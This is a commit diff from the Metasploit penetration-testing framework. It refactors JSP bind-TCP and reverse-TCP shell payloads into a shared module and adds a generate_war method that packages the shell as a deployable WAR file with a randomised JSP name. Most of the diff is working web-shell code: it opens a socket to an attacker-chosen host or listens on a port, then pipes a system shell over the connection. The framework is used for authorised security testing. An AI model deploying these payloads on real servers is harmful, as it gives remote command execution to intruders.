Land rapid7#2811 - Add generate_war to jsp_shell payloads

Author: wchen-r7

lib/msf/core/payload/jsp.rb

@@ -0,0 +1,154 @@
+# -*- coding: binary -*-
+require 'msf/core'
+require 'rex'
+
+module Msf::Payload::JSP
+  # Outputs jsp that spawns a bind TCP shell
+  # @return [String] jsp code that executes bind TCP payload
+  def jsp_bind_tcp
+    # Modified from: http://www.security.org.sg/code/jspreverse.html
+    jsp = <<-EOS
+<%@page import="java.lang.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.io.*"%>
+<%@page import="java.net.*"%>
+
+<%
+  class StreamConnector extends Thread
+  {
+    InputStream is;
+    OutputStream os;
+
+    StreamConnector( InputStream is, OutputStream os )
+    {
+      this.is = is;
+      this.os = os;
+    }
+
+    public void run()
+    {
+      BufferedReader in  = null;
+      BufferedWriter out = null;
+      try
+      {
+        in  = new BufferedReader( new InputStreamReader( this.is ) );
+        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+        char buffer[] = new char[8192];
+        int length;
+        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+        {
+          out.write( buffer, 0, length );
+          out.flush();
+        }
+      } catch( Exception e ){}
+      try
+      {
+        if( in != null )
+          in.close();
+        if( out != null )
+          out.close();
+      } catch( Exception e ){}
+    }
+  }
+
+  try
+  {
+    ServerSocket server_socket = new ServerSocket( #{datastore['LPORT'].to_s} );
+    Socket client_socket = server_socket.accept();
+    server_socket.close();
+    Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+    ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
+    ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
+  } catch( Exception e ) {}
+%>
+    EOS
+
+    return jsp
+  end
+
+  # Outputs jsp code that spawns a reverse TCP shell
+  # @return [String] jsp code that executes reverse TCP payload
+  def jsp_reverse_tcp
+    # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
+    jsp = <<-EOS
+<%@page import="java.lang.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.io.*"%>
+<%@page import="java.net.*"%>
+
+<%
+  class StreamConnector extends Thread
+  {
+    InputStream is;
+    OutputStream os;
+
+    StreamConnector( InputStream is, OutputStream os )
+    {
+      this.is = is;
+      this.os = os;
+    }
+
+    public void run()
+    {
+      BufferedReader in  = null;
+      BufferedWriter out = null;
+      try
+      {
+        in  = new BufferedReader( new InputStreamReader( this.is ) );
+        out = new BufferedWriter( new OutputStreamWriter( this.os ) );
+        char buffer[] = new char[8192];
+        int length;
+        while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
+        {
+          out.write( buffer, 0, length );
+          out.flush();
+        }
+      } catch( Exception e ){}
+      try
+      {
+        if( in != null )
+          in.close();
+        if( out != null )
+          out.close();
+      } catch( Exception e ){}
+    }
+  }
+
+  try
+  {
+    Socket socket = new Socket( "#{datastore['LHOST']}", #{datastore['LPORT'].to_s} );
+    Process process = Runtime.getRuntime().exec( "#{datastore['SHELL']}" );
+    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+  } catch( Exception e ) {}
+%>
+    EOS
+    return jsp
+  end
+
+  # Wraps the jsp payload into a war
+  # @return [Rex::Zip::Jar] a war to execute the jsp payload
+  def generate_war
+    jsp_name = "#{Rex::Text.rand_text_alpha_lower(rand(8)+8)}.jsp"
+
+    zip = Rex::Zip::Jar.new
+
+    web_xml = <<-EOF
+<?xml version="1.0"?>
+<!DOCTYPE web-app PUBLIC
+"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
+"http://java.sun.com/dtd/web-app_2_3.dtd">
+<web-app>
+  <welcome-file-list>
+    <welcome-file>#{jsp_name}</welcome-file>
+  </welcome-file-list>
+</web-app>
+    EOF
+
+    zip.add_file("WEB-INF/", '')
+    zip.add_file("WEB-INF/web.xml", web_xml)
+    zip.add_file(jsp_name, generate)
+
+    zip
+  end
+end

modules/payloads/singles/java/jsp_shell_bind_tcp.rb

@@ -4,13 +4,15 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/jsp'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::JSP
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -34,68 +36,7 @@ def initialize(info = {})
 
 
   def generate
-    # Modified from: http://www.security.org.sg/code/jspreverse.html
-    jsp = %q{
-      <%@page import="java.lang.*"%>
-      <%@page import="java.util.*"%>
-      <%@page import="java.io.*"%>
-      <%@page import="java.net.*"%>
-
-      <%
-        class StreamConnector extends Thread
-        {
-          InputStream is;
-          OutputStream os;
-
-          StreamConnector( InputStream is, OutputStream os )
-          {
-            this.is = is;
-            this.os = os;
-          }
-
-          public void run()
-          {
-            BufferedReader in  = null;
-            BufferedWriter out = null;
-            try
-            {
-              in  = new BufferedReader( new InputStreamReader( this.is ) );
-              out = new BufferedWriter( new OutputStreamWriter( this.os ) );
-              char buffer[] = new char[8192];
-              int length;
-              while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
-              {
-                out.write( buffer, 0, length );
-                out.flush();
-              }
-            } catch( Exception e ){}
-            try
-            {
-              if( in != null )
-                in.close();
-              if( out != null )
-                out.close();
-            } catch( Exception e ){}
-          }
-        }
-
-        try
-        {
-          ServerSocket server_socket = new ServerSocket( LPORT );
-          Socket client_socket = server_socket.accept();
-          server_socket.close();
-          Process process = Runtime.getRuntime().exec( "SHELL" );
-          ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
-          ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start();
-        } catch( Exception e ) {}
-      %>
-    }
-
-    jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
-
-    jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
-
-    return super + jsp
+    return super + jsp_bind_tcp
   end
 
 end

modules/payloads/singles/java/jsp_shell_reverse_tcp.rb

@@ -4,13 +4,15 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/jsp'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::JSP
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -34,72 +36,12 @@ def initialize(info = {})
 
 
   def generate
-    # JSP Reverse Shell modified from: http://www.security.org.sg/code/jspreverse.html
-    jsp = %q{
-      <%@page import="java.lang.*"%>
-      <%@page import="java.util.*"%>
-      <%@page import="java.io.*"%>
-      <%@page import="java.net.*"%>
-
-      <%
-        class StreamConnector extends Thread
-        {
-          InputStream is;
-          OutputStream os;
-
-          StreamConnector( InputStream is, OutputStream os )
-          {
-            this.is = is;
-            this.os = os;
-          }
-
-          public void run()
-          {
-            BufferedReader in  = null;
-            BufferedWriter out = null;
-            try
-            {
-              in  = new BufferedReader( new InputStreamReader( this.is ) );
-              out = new BufferedWriter( new OutputStreamWriter( this.os ) );
-              char buffer[] = new char[8192];
-              int length;
-              while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
-              {
-                out.write( buffer, 0, length );
-                out.flush();
-              }
-            } catch( Exception e ){}
-            try
-            {
-              if( in != null )
-                in.close();
-              if( out != null )
-                out.close();
-            } catch( Exception e ){}
-          }
-        }
-
-        try
-        {
-          Socket socket = new Socket( "LHOST", LPORT );
-          Process process = Runtime.getRuntime().exec( "SHELL" );
-          ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
-          ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
-        } catch( Exception e ) {}
-      %>
-    }
 
     if( !datastore['LHOST'] or datastore['LHOST'].empty? )
       return super
     end
 
-    jsp = jsp.gsub( "LHOST", datastore['LHOST'] )
-
-    jsp = jsp.gsub( "LPORT", datastore['LPORT'].to_s )
-
-    jsp = jsp.gsub( "SHELL", datastore['SHELL'] )
-
-    return super + jsp
+    return super + jsp_reverse_tcp
   end
 
 end

msfpayload

@@ -213,7 +213,7 @@ if (cmd =~ /^(p|y|r|d|c|h|j|x|b|v|w|n)$/)
     plat = payload.platform.platforms
 
     exe  = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
-    if(!exe and plat.index(Msf::Module::Platform::Java))
+    if (!exe && payload.respond_to?(:generate_war))
       exe = payload.generate_war.pack
     elsif exe
       exe  = Msf::Util::EXE.to_jsp_war(exe)